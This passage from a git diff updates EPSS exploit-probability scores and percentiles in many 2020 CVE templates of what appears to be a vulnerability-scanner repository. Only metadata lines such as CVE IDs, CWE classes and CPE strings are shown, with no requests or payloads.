0.99758 + epss-percentile: 0.99757 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 43192d1e347..53bc68c13f6 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-24550 cwe-id: CWE-601 epss-score: 0.64544 - epss-percentile: 0.98389 + epss-percentile: 0.98392 cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index 82cac06a684..ad256939532 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-24701 cwe-id: CWE-79 epss-score: 0.40404 - epss-percentile: 0.97228 + epss-percentile: 0.97227 cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24881.yaml b/http/cves/2020/CVE-2020-24881.yaml index eb259a652d0..7a9bc811716 100644 --- a/http/cves/2020/CVE-2020-24881.yaml +++ b/http/cves/2020/CVE-2020-24881.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-24881 cwe-id: CWE-918 epss-score: 0.91116 - epss-percentile: 0.99624 + epss-percentile: 0.99623 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index d15d026661e..b05bf322fef 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-24902 cwe-id: CWE-79 epss-score: 0.05233 - epss-percentile: 0.89654 + epss-percentile: 0.89651 cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index edac7b21bdc..69aab88229e 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-24903 cwe-id: CWE-79 epss-score: 0.05233 - epss-percentile: 0.89654 + epss-percentile: 0.89651 cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index d8deaaebe20..918e5fa90e6 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24912 cwe-id: CWE-79 - epss-score: 0.3192 - epss-percentile: 0.96671 + epss-score: 0.37064 + epss-percentile: 0.97031 cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index ea62747eee0..7c1f0e4c64b 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25078 epss-score: 0.94229 - epss-percentile: 0.99921 + epss-percentile: 0.9992 cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25200.yaml b/http/cves/2020/CVE-2020-25200.yaml index 38fecf83093..f939689cf15 100644 --- a/http/cves/2020/CVE-2020-25200.yaml +++ b/http/cves/2020/CVE-2020-25200.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-25200 cwe-id: CWE-203 - epss-score: 0.6809 - epss-percentile: 0.98535 + epss-score: 0.62652 + epss-percentile: 0.98307 cpe: cpe:2.3:a:pritunl:pritunl:1.29.2145.25:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index 07e748eca6e..ef611ebfa9b 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2020-25213 cwe-id: CWE-434 epss-score: 0.9442 - epss-percentile: 0.99979 + epss-percentile: 0.99977 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index 3092741a560..c9d4ccc9a3b 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-25223 cwe-id: CWE-78 epss-score: 0.94395 - epss-percentile: 0.99972 + epss-percentile: 0.99971 cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 0b3d38b0d4e..0b205357519 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-25495 cwe-id: CWE-79 - epss-score: 0.01421 - epss-percentile: 0.80188 + epss-score: 0.01051 + epss-percentile: 0.77087 cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 46c71404895..32a70b7762c 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -21,7 +21,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-2551 epss-score: 0.94412 - epss-percentile: 0.99977 + epss-percentile: 0.99976 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index 930631a6681..3f82891db3b 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-25780 cwe-id: CWE-22 epss-score: 0.63364 - epss-percentile: 0.98337 + epss-percentile: 0.98339 cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml index 88996f8557b..384a5408ace 100644 --- a/http/cves/2020/CVE-2020-26073.yaml +++ b/http/cves/2020/CVE-2020-26073.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2020-26073 epss-score: 0.90637 - epss-percentile: 0.99596 + epss-percentile: 0.99594 metadata: max-request: 1 tags: cve,cve2020,cisco,lfi,vkev,vuln diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index 1c5f8e79c78..41680a16acb 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-26258 cwe-id: CWE-918 epss-score: 0.9368 - epss-percentile: 0.99835 + epss-percentile: 0.99836 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26836.yaml b/http/cves/2020/CVE-2020-26836.yaml index 4bedc38062f..6efcca0d035 100644 --- a/http/cves/2020/CVE-2020-26836.yaml +++ b/http/cves/2020/CVE-2020-26836.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-26836 cwe-id: CWE-601 epss-score: 0.05012 - epss-percentile: 0.89407 + epss-percentile: 0.89405 cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26879.yaml b/http/cves/2020/CVE-2020-26879.yaml index 87c0625aa06..20e60de5b85 100644 --- a/http/cves/2020/CVE-2020-26879.yaml +++ b/http/cves/2020/CVE-2020-26879.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2020-26879 cwe-id: CWE-798 epss-score: 0.89451 - epss-percentile: 0.9953 + epss-percentile: 0.99531 cpe: cpe:2.3:a:commscope:ruckus_vriot:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 9b3850a9107..2e6b948a4d1 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -21,7 +21,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-2733 epss-score: 0.89717 - epss-percentile: 0.99541 + epss-percentile: 0.99543 cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index ec72acb40ac..2fbfc8b7577 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-27361 cwe-id: CWE-668 epss-score: 0.89331 - epss-percentile: 0.99523 + epss-percentile: 0.99524 cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 689232bd420..55cb7f03dc7 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-27481 cwe-id: CWE-89 epss-score: 0.51483 - epss-percentile: 0.97796 + epss-percentile: 0.97792 cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 47cfac4463a..f1f4d1714e4 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-27982 cwe-id: CWE-79 epss-score: 0.07869 - epss-percentile: 0.91752 + epss-percentile: 0.91749 cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 4c1c55ad1a1..69a300b03b1 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -21,7 +21,7 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28185 epss-score: 0.90659 - epss-percentile: 0.99597 + epss-percentile: 0.99596 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index adaaee7399c..61ce8a34a1b 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-28208 cwe-id: CWE-203 epss-score: 0.4617 - epss-percentile: 0.97548 + epss-percentile: 0.97543 cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index efef06fc7c1..9b55eeec7ea 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-28351 cwe-id: CWE-79 epss-score: 0.09311 - epss-percentile: 0.9251 + epss-percentile: 0.92503 cpe: cpe:2.3:h:mitel:shoretel:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 083fa6abf9d..a3abe84a624 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-28976 cwe-id: CWE-918 epss-score: 0.2575 - epss-percentile: 0.96077 + epss-percentile: 0.9608 cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* metadata: max-request: 4 diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 16b61c6a092..737a9ab9caf 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-29164 cwe-id: CWE-79 epss-score: 0.10218 - epss-percentile: 0.92922 + epss-percentile: 0.92915 cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29214.yaml b/http/cves/2020/CVE-2020-29214.yaml index baffe9ed370..624cce3f854 100644 --- a/http/cves/2020/CVE-2020-29214.yaml +++ b/http/cves/2020/CVE-2020-29214.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-29214 cwe-id: CWE-89 epss-score: 0.47269 - epss-percentile: 0.97593 + epss-percentile: 0.97588 cpe: cpe:2.3:a:alumni_management_system_project:alumni_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-29279.yaml b/http/cves/2020/CVE-2020-29279.yaml index b3f379f6bf0..d52cf45988d 100644 --- a/http/cves/2020/CVE-2020-29279.yaml +++ b/http/cves/2020/CVE-2020-29279.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29279 epss-score: 0.49028 - epss-percentile: 0.97677 + epss-percentile: 0.97673 cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* metadata: vendor: 74cms diff --git a/http/cves/2020/CVE-2020-29390.yaml b/http/cves/2020/CVE-2020-29390.yaml index 7d6f8a1d0c4..a29922826b3 100644 --- a/http/cves/2020/CVE-2020-29390.yaml +++ b/http/cves/2020/CVE-2020-29390.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-29390 cwe-id: CWE-78 epss-score: 0.90592 - epss-percentile: 0.99592 + epss-percentile: 0.99591 cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 125b0c16a9b..aadf942133c 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-29395 cwe-id: CWE-79 epss-score: 0.03284 - epss-percentile: 0.86832 + epss-percentile: 0.86833 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index fc274b92e4a..3d8c347e240 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-29597 cwe-id: CWE-434 epss-score: 0.85276 - epss-percentile: 0.99328 + epss-percentile: 0.99327 cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35131.yaml b/http/cves/2020/CVE-2020-35131.yaml index 013bb4bb217..235feb506fa 100644 --- a/http/cves/2020/CVE-2020-35131.yaml +++ b/http/cves/2020/CVE-2020-35131.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-35131 cwe-id: CWE-94 epss-score: 0.91149 - epss-percentile: 0.99628 + epss-percentile: 0.99626 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: vendor: agentejo diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index e3319cc1e51..f693f778a98 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-35338 cwe-id: CWE-798 epss-score: 0.79871 - epss-percentile: 0.99058 + epss-percentile: 0.99057 cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index bb334939274..64e17f97ab1 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35476 cwe-id: CWE-78 epss-score: 0.9425 - epss-percentile: 0.99926 + epss-percentile: 0.99925 cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 3044919f6f2..2f893111d54 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-35598 cwe-id: CWE-22 epss-score: 0.74425 - epss-percentile: 0.98799 + epss-percentile: 0.98797 cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index 148e96d8f3d..1fff889e105 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-35749 cwe-id: CWE-22 epss-score: 0.76788 - epss-percentile: 0.98906 + epss-percentile: 0.98905 cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index d158e737733..29c55472288 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-35774 cwe-id: CWE-79 epss-score: 0.81158 - epss-percentile: 0.99123 + epss-percentile: 0.99125 cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 84a6de2a4b8..a5974f7ea55 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35984 cwe-id: CWE-79 epss-score: 0.01648 - epss-percentile: 0.81565 + epss-percentile: 0.81557 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 93bb38452fd..b323a875cc4 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35985 cwe-id: CWE-79 epss-score: 0.05134 - epss-percentile: 0.89553 + epss-percentile: 0.89551 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 1d4a5e42e64..6a8c8e09a59 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35986 cwe-id: CWE-79 epss-score: 0.01614 - epss-percentile: 0.81371 + epss-percentile: 0.81362 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-36333.yaml b/http/cves/2020/CVE-2020-36333.yaml index 798abfd6303..f992c7fec8d 100644 --- a/http/cves/2020/CVE-2020-36333.yaml +++ b/http/cves/2020/CVE-2020-36333.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-36333 cwe-id: CWE-285 epss-score: 0.50218 - epss-percentile: 0.97743 + epss-percentile: 0.97738 metadata: verified: true max-request: 1 diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index b26536f789d..bcf8503a5eb 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-36365 cwe-id: CWE-601 epss-score: 0.09448 - epss-percentile: 0.92572 + epss-percentile: 0.92564 cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index 084f3455e59..e1a1f165b6a 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-36510 cwe-id: CWE-79 epss-score: 0.02579 - epss-percentile: 0.85161 + epss-percentile: 0.85157 cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: verified: "false" diff --git a/http/cves/2020/CVE-2020-36723.yaml b/http/cves/2020/CVE-2020-36723.yaml index da9f9d6a6c4..ac8cbedb9e3 100644 --- a/http/cves/2020/CVE-2020-36723.yaml +++ b/http/cves/2020/CVE-2020-36723.yaml @@ -18,7 +18,7 @@ info: cvss-score: 5.3 cve-id: CVE-2020-36723 epss-score: 0.14607 - epss-percentile: 0.94264 + epss-percentile: 0.94261 cwe-id: CWE-200 cpe: cpe:2.3:a:cridio:listingpro:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2020/CVE-2020-36728.yaml b/http/cves/2020/CVE-2020-36728.yaml index eb9f5c3538c..9d1401bdf82 100644 --- a/http/cves/2020/CVE-2020-36728.yaml +++ b/http/cves/2020/CVE-2020-36728.yaml @@ -20,7 +20,7 @@ info: cvss-score: 6.5 cve-id: CVE-2020-36728 epss-score: 0.77717 - epss-percentile: 0.9895 + epss-percentile: 0.98949 cpe: cpe:2.3:a:tunasite:adning_advertising:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-36836.yaml b/http/cves/2020/CVE-2020-36836.yaml index 5b3f18ad751..a041ce531d1 100644 --- a/http/cves/2020/CVE-2020-36836.yaml +++ b/http/cves/2020/CVE-2020-36836.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-36836 cwe-id: CWE-862 epss-score: 0.19778 - epss-percentile: 0.9525 + epss-percentile: 0.95249 cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index be732ad13a6..cab3101a95e 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-5191 cwe-id: CWE-79 epss-score: 0.04817 - epss-percentile: 0.89188 + epss-percentile: 0.89186 cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 03bdf042560..fbc74a5e63c 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-5410 cwe-id: CWE-23,CWE-22 epss-score: 0.94323 - epss-percentile: 0.99947 + epss-percentile: 0.99948 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index 4d8d73a8bec..6a4588e6965 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-5775 cwe-id: CWE-918 epss-score: 0.70759 - epss-percentile: 0.98648 + epss-percentile: 0.98647 cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index f406dbb5369..4fb66c62a00 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-5776 cwe-id: CWE-352 epss-score: 0.79726 - epss-percentile: 0.99053 + epss-percentile: 0.99052 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 3d987d72371..da9c21374de 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-5777 cwe-id: CWE-287 epss-score: 0.91472 - epss-percentile: 0.99648 + epss-percentile: 0.99647 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index 5c4469fbb27..ddb919d4ccf 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-6287 cwe-id: CWE-306 epss-score: 0.94395 - epss-percentile: 0.99972 + epss-percentile: 0.99971 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index 386711e5efe..13862b749ac 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-6308 cwe-id: CWE-918 epss-score: 0.82056 - epss-percentile: 0.9917 + epss-percentile: 0.99172 cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index 538f15e832e..259837fe9cf 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-7107 cwe-id: CWE-79 epss-score: 0.05245 - epss-percentile: 0.89668 + epss-percentile: 0.89665 cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index caa969128ce..4001578210e 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-7209 epss-score: 0.93631 - epss-percentile: 0.99828 + epss-percentile: 0.99829 cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index 2049c2ce81b..efa612e7712 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -26,7 +26,7 @@ info: cve-id: CVE-2020-7318 cwe-id: CWE-79 epss-score: 0.12523 - epss-percentile: 0.93725 + epss-percentile: 0.93721 cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 7c72a23787e..54bd4bc23da 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-7796 cwe-id: CWE-918 epss-score: 0.90602 - epss-percentile: 0.99594 + epss-percentile: 0.99592 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index 963c0e35a8a..cfff9e06108 100644 --- 